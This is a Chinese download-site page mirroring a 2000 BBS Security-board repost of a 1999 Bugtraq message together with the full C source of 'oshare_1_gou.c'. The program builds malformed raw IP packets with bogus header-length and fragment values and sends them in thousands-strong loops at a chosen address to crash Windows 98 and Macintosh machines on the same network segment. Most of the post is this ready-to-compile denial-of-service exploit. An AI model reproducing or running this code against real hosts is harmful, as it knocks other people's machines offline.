⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 330.htm

📁 unix高级编程原吗
💻 HTM
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center">               ● UNIX网络编程                       (BM: clown)                </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p   align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="184.htm">上一层</a>][<a href="331.htm">下一篇</a>]
<hr><p align="left"><small>发信人: cloudsky (小四), 信区: Security <br>

标  题: oshare_1_gou.c <br>

发信站: 武汉白云黄鹤站 (Mon Apr 10 11:52:07 2000), 站内信件 <br>

  <br>

  <br>

/* <br>

Date: Mon, 25 Jan 1999 15:38:43 +0900 <br>

From: DEF CON ZERO WINDOW <defcon0@UGTOP.COM> <br>

To: BUGTRAQ@netspace.org <br>

Subject: Win98 crash? <br>

  <br>

  <br>

Hi, <br>

  <br>

 Windows98 crashed by the packet which added a hand to the value of the <br>

IP header of the packet a little. (From now, the packet of this  structure <br>

is called with "oshare packet".) Because it isn't familiar, I don't know <br>

what kind of error happens concretely inside OS to the inside of Windows. <br>

But, ihl and tot_len. Then, it guesses that crash will happen by the <br>

value of frag_bit&frag_off. <br>

  <br>

 But, because value is wrong, this "oshare packet" can't be transmitted <br>

to the outside of the network. This is here well, and it is here badly, <br>



too. But, even whose machine will be able to be killed in the same <br>

segment. <br>

  <br>

 Before someone improves this program, MicroSoft should take a <br>

countermeasure immediately. <br>

  <br>

 A Macintosh crashed by the "oshare packet" in the same way, too. <br>

But, it isn't realized by this program. It will be released soon. <br>

  <br>

 Reboot hangs freely if it becomes blue screen when Windows98 receives <br>

a "oshare packet". When blue screen comes out, the function of the <br>

network can't be used any more after it. The error of TCP/IP is started <br>

in the case of the Macintosh, and the function of the network can't be <br>

used any more. <br>

  <br>

 Is this phenomenon a bug?   $B!3 (B( $B!-!<!. (B) $B%N (B <br>

  <br>

  <br>

  <br>

Signed by R00t Zer0 <br>

------------------- <br>

*/ <br>

*/ <br>

  <br>

  <br>

/****************************************************************************/ <br>

/*      [ oshare_1_gou  ver 0.1 ]  -- Dressing up No.1 --                   */ <br>

/*                                                                          */ <br>

  <br>

/*                                                                          */ <br>

/*                                                                          */ <br>

/*                                                                          */ <br>

/*  This program transmits the "oshare" packet which starts a machine aga-  */ <br>

/*  in or crash. But, because it can't pass through the router, it can be   */ <br>

/*  carried out only in the same segment.                                   */ <br>

/*  "oshare packet" is (frag 39193:-4@65528+), If ihl and tot_len are cha-  */ <br>

/*  nged, it has already tested that it becomes possible to kill Mac, too.  */ <br>

/*  -----------------------------------------                               */ <br>

/*  Written by R00t Zer0                                                    */ <br>

/*  E-Mail  : defcon0@ugtop.com                                             */ <br>

/*  Web URL : http://www.ugtop.com/defcon0/index.htm                        */ <br>

/****************************************************************************/ <br>

  <br>

  <br>

#include <stdio.h> <br>



#include <stdlib.h> <br>

#include <string.h> <br>

#include <unistd.h> <br>

#include <netdb.h> <br>

#include <sys/socket.h> <br>

#include <sys/types.h> <br>

#include <netinet/in.h> <br>

#include <netinet/ip.h> <br>

#include <netinet/tcp.h> <br>

#include <netinet/in_systm.h> <br>

#include <arpa/inet.h> <br>

  <br>

  <br>

u_short in_cksum( u_short *, int ); <br>

int             send_oshare_packet( int, u_long ); <br>

int             send_oshare_packet( int, u_long ); <br>

  <br>

  <br>

u_short <br>

in_cksum( u_short *addr, int len ) <br>

        { <br>

        int             nleft   = len; <br>



        u_short *w              = addr; <br>

        int             sum             = 0; <br>

        u_short answer  = 0; <br>

  <br>

        while( nleft > 1 ) <br>

                { <br>

                sum += *w++; <br>

                nleft -= 2; <br>

                } <br>

  <br>

        if (nleft == 1) <br>

                { <br>

                *( u_char *)( &answer ) = *( u_char *)w; <br>

                sum += answer; <br>

                } <br>

  <br>

        sum      = ( sum >> 16 ) + ( sum & 0xffff ); <br>

        sum += ( sum >> 16 ); <br>

        answer = ~sum; <br>

        return( answer ); <br>

        } <br>

  <br>

  <br>

  <br>

  <br>

int <br>

send_oshare_packet(int sock_send, u_long dst_addr) <br>

{ <br>

  char    *packet; <br>

  int     send_status; <br>

  struct  iphdr           *ip; <br>

  struct  sockaddr_in     to; <br>

  <br>

  packet  = (char*)malloc(40); <br>

  ip      = (struct iphdr *)(packet); <br>

  memset(packet, 0, 40); <br>

  <br>

  ip->version             = 4; <br>

  ip->ihl                 = 11; <br>

  ip->tos                 = 0x00; <br>

  ip->tot_len             = htons(44); <br>

  ip->id                  = htons(1999); <br>

  ip->frag_off            = htons(16383); <br>

  ip->ttl                 = 0xff; <br>

  ip->protocol            = IPPROTO_UDP; <br>



  ip->saddr               = htonl(inet_addr("1.1.1.1")); <br>

  ip->daddr               = dst_addr; <br>

  ip->check               = in_cksum((u_short *)ip, 44); <br>

  <br>

  to.sin_family           = AF_INET; <br>

  to.sin_port             = htons( 0x123 ); <br>

  to.sin_addr.s_addr      = dst_addr; <br>

  <br>

  send_status = sendto(sock_send, packet, 40, 0, <br>

                      ( struct sockaddr *)&to, sizeof( struct sockaddr ) ); <br>

  free( packet ); <br>

  return( send_status ); <br>

} <br>

  <br>

int <br>

main(int argc, char *argv[]) <br>

{ <br>

  char    tmp_buffer[ 1024 ]; <br>

  int     loop, loop2; <br>

  <br>

  int             sock_send; <br>

  u_long  src_addr, dst_addr; <br>



  u_short src_port, dst_port; <br>

  <br>

  struct  hostent     *host; <br>

  struct  sockaddr_in addr; <br>

  <br>

  time_t  t; <br>

  <br>

  if(argc != 3) <br>

  { <br>

    printf( "Usage : %s <dst addr> <num(k)>\n", argv[0] ); <br>

    exit( -1 ); <br>

  } <br>

  <br>

  t = time( 0 ); <br>

  srand((u_int)t); <br>

  <br>

  memset(&addr, 0, sizeof( struct sockaddr_in)); <br>

  addr.sin_family         = AF_INET; <br>

  addr.sin_addr.s_addr    = inet_addr( argv[1]); <br>

  if(addr.sin_addr.s_addr == -1) <br>

  { <br>

    host = gethostbyname( argv[1] ); <br>



    if(host == NULL) <br>

    { <br>

       printf( "Unknown host %s.\n", argv[1] ); <br>

       exit( -1 ); <br>

    } <br>

    addr.sin_family = host->h_addrtype; <br>

    memcpy( ( caddr_t )&addr.sin_addr, host->h_addr, host->h_length ); <br>

  } <br>

  memcpy( &dst_addr, ( char *)&addr.sin_addr.s_addr, 4 ); <br>

  if((sock_send=socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) <br>

  { <br>

    perror( "Getting raw send socket" ); <br>

    exit( -1 ); <br>

  } <br>

  printf( "\n\"Oshare Packet\" sending" ); <br>

  fflush( stdout ); <br>

  for( loop = 0; loop < atoi( argv[2] ); loop++ ) <br>

  { <br>

    for( loop2 = 0; loop2 < 1000; loop2++ ) <br>

      send_oshare_packet( sock_send, dst_addr ); <br>

    fprintf( stderr, "." ); <br>

    fflush( stdout ); <br>



                } <br>

    printf( "\n\nDone.\n\n" ); <br>

    fflush( stdout ); <br>

  <br>

    close( sock_send ); <br>

    exit( 0 ); <br>

  } <br>

} <br>

-- <br>

            我问飘逝的风:来迟了? <br>

            风感慨:是的,他们已经宣战。 <br>

            我问苏醒的大地:还有希望么? <br>

            大地揉了揉眼睛:还有,还有无数代的少年。 <br>

            我问长空中的英魂:你们相信? <br>

            英魂带着笑意离去:相信,希望还在。 <br>

</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="184.htm">上一层</a>][<a href="331.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -